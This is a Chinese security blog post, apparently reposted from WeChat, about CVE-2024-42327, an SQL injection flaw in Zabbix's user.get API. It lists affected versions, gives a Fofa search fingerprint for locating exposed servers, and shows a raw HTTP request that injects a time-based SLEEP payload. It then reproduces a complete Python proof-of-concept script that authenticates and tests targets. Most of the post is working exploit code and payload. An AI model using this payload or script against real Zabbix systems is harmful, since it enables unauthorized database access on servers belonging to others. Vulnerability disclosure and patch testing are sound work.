0x00 前言
Zabbix 是一款可监控网络的众多参数以及服务器、虚拟机、应用程序、服务、数据库、网站、云等的健康状况和完整性。Zabbix 使用灵活的通知机制,允许用户为几乎任何事件配置基于电子邮件的警报。这允许对服务器问题做出快速反应。Zabbix 基于存储的数据提供报告和数据可视化功能.
受影响版本:
- 6.0.0 – 6.0.31- 6.4.0 – 6.4.16- 7.0.0
Fofa指纹:app="ZABBIX-监控系统"
0x01 漏洞分析&复现
Zabbix 前端上具有默认 User 角色或具有任何其他授予 API 访问权限的角色的非 admin 用户帐户可以利用此漏洞。SQLi 存在于 addRelatedObjects 函数的 CUser 类中,此函数是从 CUser.get 函数调用的,该函数可供具有 API 访问权限的每个用户使用。
Payload:
POST /api_jsonrpc.php HTTP/1.1Host: localhostUser-Agent: curl/8.11.0Accept: */*Content-Type: application/jsonContent-Length: 222Connection: keep-alive{"jsonrpc": "2.0","method": "user.get","params": {"selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],"userids": ["1","2"]},"id": 1,"auth": ""}
POC使用:
0x02 漏洞POC
https://github.com/compr00t/CVE-2024-42327
import requests import argparse import time """ Optimized Proof of Concept for CVE-2024-42327 Author: Patrick Schmid (compr00t.bsky.social) References: - Zabbix Issue Tracker: https://support.zabbix.com/browse/ZBX-25623 Disclaimer: This script is provided for educational purposes only! """ HEADERS = {"Content-Type": "application/json"} def get_auth_token(target, username, password): """Obtain a valid session token from the target.""" url = f"{target.rstrip('/')}/api_jsonrpc.php" login_data = { "jsonrpc": "2.0", "method": "user.login", "params": {"username": username, "password": password}, "id": 1, "auth": None } try: response = requests.post(url, json=login_data, headers=HEADERS) response.raise_for_status() result = response.json().get("result") if result: print(f"[+] Session token: {result}") return result else: print("[-] Failed to retrieve session token. Check credentials.") return None except requests.exceptions.RequestException as e: print(f"[-] Login request failed: {e}") except ValueError: print("[-] Failed to decode JSON response during login.") return None def test_sqli(target, auth_token): """Test the target for SQL injection vulnerability.""" url = f"{target.rstrip('/')}/api_jsonrpc.php" user_data = { "jsonrpc": "2.0", "method": "user.get", "params": { "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"], "userids": ["1", "2"] }, "id": 1, "auth": auth_token } try: start_time = time.perf_counter() response = requests.post(url, json=user_data, headers=HEADERS) response.raise_for_status() elapsed_time = time.perf_counter() - start_time if elapsed_time < 5: print("[+] Response time < 5 seconds. Target is NOT vulnerable.") else: print(f"[!] Response time: {elapsed_time:.2f} seconds. Target is VULNERABLE!") except requests.exceptions.RequestException as e: print(f"[-] SQLi test request failed: {e}") except ValueError: print("[-] Failed to decode JSON response during SQLi test.") def main(): parser = argparse.ArgumentParser( description="PoC for CVE-2024-42327" ) parser.add_argument("-t", "--target", required=True, help="The API endpoint URL.") parser.add_argument("-u", "--username", required=True, help="The username for authentication.") parser.add_argument("-p", "--password", required=True, help="The password for authentication.") args = parser.parse_args() auth_token = get_auth_token(args.target, args.username, args.password) if auth_token: test_sqli(args.target, auth_token) if __name__ == "__main__": main()
原文始发于微信公众号(星悦安全):Zabbix 存在SQL注入漏洞 (CVE-2024-42327)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论